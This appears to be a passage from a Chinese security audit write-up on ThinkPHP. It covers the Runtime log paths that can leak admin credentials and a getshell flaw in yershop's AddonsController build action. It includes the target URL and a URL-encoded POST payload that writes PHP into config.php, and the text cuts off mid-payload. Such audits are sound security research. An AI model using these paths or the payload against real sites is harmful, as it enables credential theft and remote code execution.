ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,可以支持Windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。
Runtime日志
在ThinkPHP3的版本中,入口文件index.php是跟应用目录、框架目录在同一个目录下的,在DEBUG开启的状态下,会在runtime生成日志文件,泄露一些管理员登录后台的账号密码等。tp3的日志文件命名规则为:根目录(或者应用目录)/Runtime/Logs/Admin/20_08_17.log(年份前2位_月份_日.log)
在tp5的版本中,入口文件index是在public的目录下,它跟应用目录、框架目录不在同一个目录,但是有些管理员会将入口文件放置到跟应用目录、框架目录同目录,tp5的命名规则为:
./runtime/log/202008/17.log(./runtime/log/年月/日.log)
file_put_contents函数
在ThinkPHP3中,后台有时会写入配置文件来getshell的,所以我倾向全局查找这个file_put_contents函数,然后在网上找个代码--yershop(TP3开发的那个版本)来进行审计,后台可以通过写入文件来拿shell。全局查找file_put_contents函数,发现控制器AddonsController.class.php中的build存在。
发现存在两处写入文件,这里第一处需要满足以下条件:
$addon_dir可控,$data可控,$addonModel可控
第二处需要满足:
$data['has_config'] == 1,$addon_dir可控
跟踪发现$data是从全局POST获取的,所有可控,即$addon_dir可控。
构造payload如下,后台创建扩展。
点击确定,抓包,首先会判断标识名这个插件是否存在,不存在就执行build访问。
由于要写入config.php这个文件需要满足$data['has_config'] == 1,最后构造payload。
访问:index.php?s=/Admin/Addons/build.html
POST发送:
info%5Bname%5D=Example&info%5Btitle%5D=%E7%A4%BA%E5%88%97&info%5Bversion%5D=0.1&info%5Bauthor%5D=%E6%97%A0%E5%90%8D&info%5Bdescription%5D=%E8%BF%99%E6%98%AF%E4%B8%80%E4%B8%AA%E4%B8%B4%E6%97%B6%E6%8F%8F%E8%BF%B0&info%5Bstatus%5D=1&config=%3C%3Fphp%0D%0Areturn+array(%0D%0A%09'random'%3D%3Earra